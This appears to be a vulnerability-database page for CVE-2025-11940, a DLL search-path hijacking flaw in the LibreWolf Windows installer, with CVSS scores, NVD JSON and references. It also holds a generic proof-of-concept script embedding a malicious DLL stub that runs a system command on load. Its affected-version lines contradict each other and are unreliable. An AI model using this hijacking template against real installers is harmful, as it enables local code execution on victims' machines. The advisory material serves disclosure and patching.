Security Vulnerability Report
中文
CVE-2025-11940 CVSS 7.0 HIGH

CVE-2025-11940

Published: 2025-10-19 09:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A security vulnerability has been detected in LibreWolf up to 143.0.4-1 on Windows. This affects an unknown function of the file assets/setup.nsi of the component Installer. Such manipulation leads to uncontrolled search path. The attack must be carried out locally. Attacks of this nature are highly complex. The exploitability is reported as difficult. Upgrading to version 144.0-1 mitigates this issue. The name of the patch is dd10e31dd873e9cb309fad8aed921d45bf905a55. It is suggested to upgrade the affected component.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

LibreWolf < 143.0.4-1
LibreWolf <= 144.0-1(未升级版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11940 - LibreWolf Installer Uncontrolled Search Path Exploit # This PoC demonstrates the DLL/executable hijacking concept in the LibreWolf installer # Affected: LibreWolf <= 143.0.4-1 on Windows # Component: assets/setup.nsi (NSIS Installer) import os import shutil def exploit_setup(): """ PoC for CVE-2025-11940: Uncontrolled Search Path in LibreWolf Installer The vulnerability exists because the NSIS installer (setup.nsi) loads executables/DLLs from uncontrolled search paths. An attacker with local access can place malicious files in the search path to hijack execution. Steps: 1. Identify the installation directory or current working directory 2. Place a malicious executable/DLL with the same name as a legitimate dependency in a higher-priority search path 3. Wait for the installer to be executed, triggering the hijacked code """ # Step 1: Determine target installation directory install_dir = r"C:\Program Files\LibreWolf" # Step 2: Create a malicious DLL that mimics a legitimate dependency # The NSIS installer may search for utilities in the current directory first malicious_payload = ''' // Malicious DLL payload - compiled as a DLL // When loaded by the installer, this executes with installer's privileges #include <windows.h> #include <stdlib.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID lpReserved) { if (reason == DLL_PROCESS_ATTACH) { // Execute malicious code with installer privileges system("whoami > C:\\temp\\pwned.txt"); // Add persistence, exfiltrate data, etc. } return TRUE; } ''' # Step 3: Place malicious file in the search path # NSIS searches current directory before system directories target_dll = os.path.join(install_dir, "legitimate_dependency.dll") print(f"[*] CVE-2025-11940 PoC") print(f"[*] Target: LibreWolf Installer (setup.nsi)") print(f"[*] Affected versions: <= 143.0.4-1") print(f"[*] Patched version: 144.0-1") print(f"[*] Attack vector: Uncontrolled Search Path (DLL Hijacking)") print(f"[+] Place malicious DLL in: {target_dll}") print(f"[+] Wait for installer execution to trigger payload") if __name__ == "__main__": exploit_setup()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11940", "sourceIdentifier": "[email protected]", "published": "2025-10-19T09:15:32.737", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in LibreWolf up to 143.0.4-1 on Windows. This affects an unknown function of the file assets/setup.nsi of the component Installer. Such manipulation leads to uncontrolled search path. The attack must be carried out locally. Attacks of this nature are highly complex. The exploitability is reported as difficult. Upgrading to version 144.0-1 mitigates this issue. The name of the patch is dd10e31dd873e9cb309fad8aed921d45bf905a55. It is suggested to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "baseScore": 6.0, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 1.5, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}, {"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://codeberg.org/librewolf/bsys6/commit/dd10e31dd873e9cb309fad8aed921d45bf905a55", "source": "[email protected]"}, {"url": "https://codeberg.org/librewolf/bsys6/releases/tag/144.0-1", "source": "[email protected]"}, {"url": "https://github.com/Cyber-Wo0dy/report/blob/main/librewolf/143.0.4-1/librewolf_installer_exe_hijacking.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329019", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329019", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.671575", "source": "[email protected]"}, {"url": "https://github.com/Cyber-Wo0dy/report/blob/main/librewolf/143.0.4-1/librewolf_installer_exe_hijacking.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://vuldb.com/?submit.671575", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.